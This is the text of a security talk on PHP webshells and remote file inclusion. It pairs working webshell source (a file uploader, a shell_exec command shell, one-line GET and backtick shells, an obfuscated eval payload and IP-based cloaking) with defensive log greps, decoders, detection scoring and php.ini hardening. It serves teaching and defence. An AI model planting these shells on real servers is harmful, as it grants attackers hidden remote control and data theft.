History, Techniques, Obfuscation and Automated Collection
Adrian Crenshaw

28 Oct 2013

http://Irongeek.com


Scripts that act as back doors for maintaining access

Common tasks:
- File management
- Command line access
- Database server access
- Bruteforcing
- Network scanning
- Pivots

Versions for all sorts of web development environments: PHP, ASP.NET, JSP, etc.

Think of it as a RAT (Remote Access Tool/Trojan) for the web


- File upload vulnerabilities
- Insecure FTP
- Command injection
- Remote File Includes/Local File Includes
- Exploits on other sites on the same shared host
- Other exploits
  - SQL injection
  - Vulnerable services

1. Client makes a request to a site with an RFI vulnerability
2. Vulnerable web server grabs the malicious file off of another server
3. File is included in code executed on the vulnerable web server
4. Attacker then executes commands on the remote vulnerable web server, uploads different shells, grabs files, etc.


- C99
- C100
- r57
- Fx29SheLL
- PLaToShell
- b374k
- WSO
- Weevely


Started as a project to show off web vulnerabilities

Like WebGoat, but designed to be easier to use and PHP based

I started it, but Jeremy Druin is in charge of it now and has way more code in it than I do


<FORM ENCTYPE="multipart/form-data" ACTION="<?php echo "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; ?>" METHOD="POST">
Send this file: <INPUT NAME="userfile" TYPE="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<?php
if ($_FILES["userfile"]["error"] > 0) {
    echo "Error: " . $_FILES["userfile"]["error"] . "<br>";
} else {
    if ($_FILES["userfile"]["name"] != "") {
        echo "Upload: " . $_FILES["userfile"]["name"] . "<br>";
        echo "Type: " . $_FILES["userfile"]["type"] . "<br>";
        echo "Size: " . ($_FILES["userfile"]["size"] / 1024) . " kB<br>";
        echo "Stored in: " . $_FILES["userfile"]["tmp_name"] . "<br>";
        // Moves the upload into the script's own directory under the client-supplied file name
        if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $_FILES["userfile"]["name"])) {
            echo "Moved to: " . getcwd() . "/" . $_FILES["userfile"]["name"];
        } else {
            echo '<font color="#FF0000">Upload failed, may not have permission.</font>';
        }
    }
}
# Based on examples from: http://www.w3schools.com/php/php_file_upload.asp
?>

<HTML><BODY>
<FORM METHOD="post" ACTION="<?php echo "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; ?>">
<INPUT TYPE="TEXT" NAME="command"><INPUT TYPE="Submit">
</FORM>
<PRE>
<?php
// Collapse doubled backslashes in the submitted command back to single ones
$command = str_replace("\\\\", "\\", $_POST['command']);
echo "<B>Results for $command: </B><P>";
// Escape angle brackets so the command output renders inside the <PRE> block
$results = str_replace("<", "&lt;", shell_exec($command));
$results = str_replace(">", "&gt;", $results);
echo $results;
?>
</PRE>
</BODY></HTML>


Example 1:

<?=($_=@$_GET[2]).@$_($_GET[1])?>

Example 2:

<? echo `$_GET[1]`?>

Could not get these to RFI

Inspired by Fredrik Almroth
http://h.ackack.net/2011/09/tiny-php-shell/

1. RFI the uploader
   - Simpler
   - Smaller
2. Upload a shell


Why not let the hosting site know they are serving a shell?

User Agent String:

Hello, I'm not attacking your site, but someone else tried using this file on your server as an RFI against my site. Contact Irongeek at Irongeek.com for more details http://www.irongeek.com/i.php?page=webshells-and-rfi


- Uploaders
- General webshells
- Testers/IDers
  Just emails the attacker that a site is vulnerable, maybe gives a bit of information about the system
- Search engine spammers
  Just show the links to search engines based on user agent strings to get higher ranking via back links
- Booters
  Botnets based on webshells; webservers generally have more bandwidth than workstations
- Local rooters
  Elevate privileges using local exploits

echo '<HTML><BODY><FORM METHOD="post" ACTION="' . "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . '"><INPUT TYPE="TEXT" NAME="command"><INPUT TYPE="Submit"></FORM><PRE>';
$command = str_replace("\\\\", "\\", $_POST['command']);
echo "<B>Results for $command: </B><P>";
$results = str_replace("<", "&lt;", shell_exec($command));
$results = str_replace(">", "&gt;", $results);
echo $results;
echo "</PRE></BODY></HTML>";

Run through http://www.mobilefish.com/services/php_obfuscator/php_obfuscator.php

<?php
eval(gzinflate(base64_decode(str_rot13('
qMSsn4ZjSZKs+lxhS5xIve7KTXue
ufY8fkwUFvsFhJjBqVdzfV+/XNdwfQlR5CV7557YyIKqtHxPRG1F4vsURlHCPL
8tLvWVwu723ntDQipvGTVCGEgecsd94lQLLWDM48+Za81NvYDZxxlLkq86
M085l0FM87PjGnDxwAAptQvymRCOKtEPsVw0h+en9iY9sxAx17s2F+zvZ0J
vWBJZzh7TJTwjLSEQBpv+hIElv6/64N6alluGUrn8tVKyjxMBtlYkXMswgIRws
UDQeSM7VV6iT1QH9fZP3AtG7K3KXOq3Ll2occD/fgdhOco1i5OBjf9WhOVn
ahBfs3qA50jw6vwmUck5Xrw+Nt==
'))));
?>
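For an analyst who finds a file shaped like the obfuscated output above, the wrappers can be peeled mechanically. This is an added example, not code from the talk or from the mobilefish tool: a Python decoder for an eval(gzinflate(base64_decode(str_rot13('...')))) chain, run against a constructed sample built inline (the slide's own blob is not used).

```python
import base64
import codecs
import re
import zlib

# Constructed sample (not the slide's blob): a harmless statement wrapped in the same
# layers the obfuscator output uses: str_rot13 -> base64 -> raw DEFLATE (gzinflate) -> eval.
INNER_PHP = 'echo "hello from a constructed sample";'
_raw_deflate = zlib.compress(INNER_PHP.encode())[2:-4]   # drop zlib header/adler32: what gzdeflate() emits
_blob = codecs.encode(base64.b64encode(_raw_deflate).decode(), "rot13")
SAMPLE = "<?php eval(gzinflate(base64_decode(str_rot13('%s')))); ?>" % _blob

# Python equivalents of the PHP wrapper functions; strings are carried as latin-1 so the
# binary stages (base64 output, compressed data) round-trip without decoding errors.
DECODERS = {
    "str_rot13":     lambda s: codecs.encode(s, "rot13"),
    "base64_decode": lambda s: base64.b64decode(s).decode("latin-1"),
    "gzinflate":     lambda s: zlib.decompress(s.encode("latin-1"), -15).decode("latin-1"),
    "gzuncompress":  lambda s: zlib.decompress(s.encode("latin-1")).decode("latin-1"),
}

# eval( f1( f2( ... 'literal' ) ) ) with any number of single-argument wrappers
CHAIN_RE = re.compile(r"eval\s*\(\s*((?:\w+\s*\(\s*)+)'([^']*)'\s*\)+")

def unwrap(php_source):
    """Peel one eval() chain. Returns (decoded_code, [wrappers, outermost first]) or None."""
    m = CHAIN_RE.search(php_source)
    if not m:
        return None
    wrappers = re.findall(r"\w+", m.group(1))
    data = m.group(2)
    for name in reversed(wrappers):          # PHP evaluates the innermost call first; do the same
        if name not in DECODERS:
            raise ValueError("no decoder for %s()" % name)
        data = DECODERS[name](data)
    return data, wrappers

def unwrap_all(php_source, max_depth=10):
    """Keep peeling while the result is itself an eval() chain (obfuscators often nest them)."""
    code, all_wrappers = php_source, []
    for _ in range(max_depth):
        step = unwrap(code)
        if step is None:
            break
        code, wrappers = step
        all_wrappers.extend(wrappers)
    return code, all_wrappers

if __name__ == "__main__":
    decoded, layers = unwrap_all(SAMPLE)
    print(" -> ".join(layers), "=>", decoded)
```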


GET is in the URL, POST is in the request headers

POST method less likely to be logged than GET

With a custom client, stealth commands via:
- Cookie headers
- Non-cookie headers

Multiple levels of obfuscation making it computationally expensive to decode


Available at: https://github.com/epinna/Weevely

Tiny, encrypted, communication over cookies, tons of modules:
- Enumerate users and /etc/passwd content
- Check php security configurations
- Crawl and enumerate web folders files permissions
- Find wrong system files permissions
- Guess files with wrong permissions in users home folders
- Bruteforce all SQL users
- Bruteforce SQL username
- Collect system information
- Send reverse TCP shell
- Open a shell on TCP port
- Execute system shell command
- Execute PHP statement
- Mount remote filesystem using HTTPfs
- Change file timestamps
- Remove remote files and folders
- Get SQL database dump
- Run SQL console or execute single queries
- Install and run Proxy to tunnel traffic through target
- Print interfaces addresses
- Port scan open TCP ports
- Install remote PHP proxy
- Find files with write
- Find files with superuser flags

// Example from Laudanum
$allowedIPs = array("192.168.1.55", "12.2.2.2");
$allowed = 0;
foreach ($allowedIPs as $IP) {
    if ($_SERVER["REMOTE_ADDR"] == $IP)
        $allowed = 1;
}
if ($allowed == 0) {
    // Anyone not on the allow-list gets a 404, so the page looks like it does not exist
    header("HTTP/1.0 404 Not Found");
    die();
}


Ugly, but works:

grep -i "=http://" access.log | grep -i "\.txt\|\.inc\.\|\.dat"

You may like my script better
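An added example (not the author's script): the same idea as the grep pipeline applied in Python to constructed access-log lines, also catching percent-encoded schemes that the literal "=http://" match misses. Like the grep, it sees only GET query strings, which is why the earlier GET-versus-POST point matters for logging.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-log lines (RFC 5737 addresses), not from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Oct/2013:10:01:02 -0400] "GET /index.php?page=http://198.51.100.9/c99.txt? HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Oct/2013:10:01:09 -0400] "GET /index.php?page=http%3A%2F%2F198.51.100.9%2Fr57.inc HTTP/1.1" 200 4711 "-" "libwww-perl/5.8"
198.51.100.22 - - [28/Oct/2013:10:02:00 -0400] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://example.test/" "Mozilla/5.0"
198.51.100.23 - - [28/Oct/2013:10:02:30 -0400] "POST /upload.php HTTP/1.1" 200 100 "-" "Mozilla/5.0"
198.51.100.24 - - [28/Oct/2013:10:03:00 -0400] "GET /redirect.php?url=http://example.test/page.html HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)
# Same extensions as the grep on the slide; a trailing '?' or '&' after the extension is allowed
INCLUDE_EXT = re.compile(r"\.(?:txt|inc|dat)(?:[?&]|$)", re.I)

def find_rfi_attempts(log_text):
    """Return (ip, timestamp, parameter, url, status) for each request that passes a remote
    URL with an include-style extension in a query parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qsl percent-decodes values, so http%3A%2F%2F is compared as http://
        for param, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
            if REMOTE_URL.match(value) and INCLUDE_EXT.search(value):
                hits.append((m.group("ip"), m.group("ts"), param, value, m.group("status")))
    return hits

def sources_by_count(hits):
    """Client addresses ordered by how many flagged requests they made."""
    counts = {}
    for ip, *_ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(counts.items(), key=lambda kv: kv[1], reverse=True)

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

The fifth sample line shows the false-positive control: a URL in a parameter is not flagged unless it also ends in one of the include-style extensions.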


AV will mostly miss them

PHP-Shell-Detector
  Just signature based to my knowledge
  Scans: php/perl/asp/aspx
  https://github.com/emposha/PHP-Shell-Detector

NeoPI
  Detects on signatures, entropy, longest word and index of coincidence
  Scans: php/asp/aspx/sh/bash/zsh/csh/tsch/pl/py/cgi/cfm
  https://github.com/Neohapsis/NeoPI
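An added example, not NeoPI's code: the four indicators the slide attributes to NeoPI (signatures, entropy, longest word, index of coincidence) implemented in Python and run over two constructed files, an ordinary page and one shaped like the obfuscated shell on the earlier slide. The signature list covers only constructs this deck shows.

```python
import base64
import hashlib
import math
import re
from collections import Counter

# Constructed inputs (not the slide's blob): an ordinary page and a file shaped like the
# eval(gzinflate(base64_decode(str_rot13(...)))) output on the obfuscation slide.
BENIGN_PHP = ('<?php\n$title = "Contact us";\necho "<h1>$title</h1>";\n'
              'if (isset($_POST["email"])) { echo "Thanks, we will be in touch."; }\n?>')
_blob = base64.b64encode(b"".join(hashlib.sha256(bytes([i])).digest() for i in range(6))).decode()
OBFUSCATED_PHP = "<?php eval(gzinflate(base64_decode(str_rot13('%s')))); ?>" % _blob

# Layered eval() decoders, request data fed straight into a shell function, and the
# backtick operator of the tiny shell.
SIGNATURES = [
    r"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(",
    r"\b(?:shell_exec|system|exec|passthru)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b",
    r"`[^`]*\$_(?:GET|POST|REQUEST|COOKIE)\b[^`]*`",
]

def entropy(text):
    """Shannon entropy in bits per character; packed or encoded blobs sit well above source code."""
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())

def longest_word(text):
    """Longest whitespace-delimited token; a base64 payload is one huge token."""
    return max((len(w) for w in text.split()), default=0)

def index_of_coincidence(text):
    """Chance two random non-space characters match; near-uniform data scores low."""
    counts = Counter(c for c in text if not c.isspace())
    n = sum(counts.values())
    return sum(c * (c - 1) for c in counts.values()) / (n * (n - 1)) if n > 1 else 0.0

def signature_hits(text):
    return [pat for pat in SIGNATURES if re.search(pat, text)]

def score(text):
    return {"entropy": entropy(text), "longest_word": longest_word(text),
            "ic": index_of_coincidence(text), "signatures": signature_hits(text)}

def rank(files):
    """Most suspicious first: signature count, then entropy, then longest word, then low IC."""
    scored = {name: score(body) for name, body in files.items()}
    key = lambda n: (len(scored[n]["signatures"]), scored[n]["entropy"],
                     scored[n]["longest_word"], -scored[n]["ic"])
    return sorted(scored, key=key, reverse=True)
```

The statistical indicators are what catch a shell whose function names never appear in clear text; the signatures alone would miss anything the obfuscator has wrapped one more time.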


- Grep
- PHP-Shell-Detector
- NeoPI

Much of the following text copied from /etc/php5/apache2/php.ini


Allow ASP-style <% %> tags.
asp_tags = Off
http://php.net/asp-tags

PHP banner in web server header
expose_php = On
http://php.net/expose-php

Whether to allow HTTP file uploads.
file_uploads = On
http://php.net/file-uploads

Display errors
display_errors = On
http://php.net/display-errors

Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On
http://php.net/allow-url-fopen

Whether to allow include/require to open URLs (like http:// or ftp://) as files. (Off by default now.)
allow_url_include = Off
http://php.net/allow-url-include

Disable easily abused functions
disable_functions = system,exec,passthru,shell_exec
http://php.net/manual/en/ini.core.php#ini.disable-functions


Turn off directory indexing

Add this to the .htaccess file or directory configs:

Options -Indexes

An example of why:
http://www.google.com/?q=intitle:index.of+c99.txt


Shared Hosting MD5 Change Detection Script
http://www.irongeek.com/i.php?page=security/shared-hosting-md5-change-detection-script

Script To Grep For RFI, Webshells, Password Grabs, Web Scanners, Etc.
http://www.irongeek.com/i.php?page=security/logwatch-script-grep-for-rfis-webscanners-webshell-attacks

Derbycon
Sept 25th-29th, 2013
http://www.derbycon.com

Others
http://www.louisvilleinfosec.com
http://skydogcon.com
http://hack3rcon.org
http://outerz0ne.org
http://phreaknic.info
http://notacon.org

Photo Credits to KC (devauto)
Derbycon Art Credits to DigiP

Twitter: @Irongeek_ADC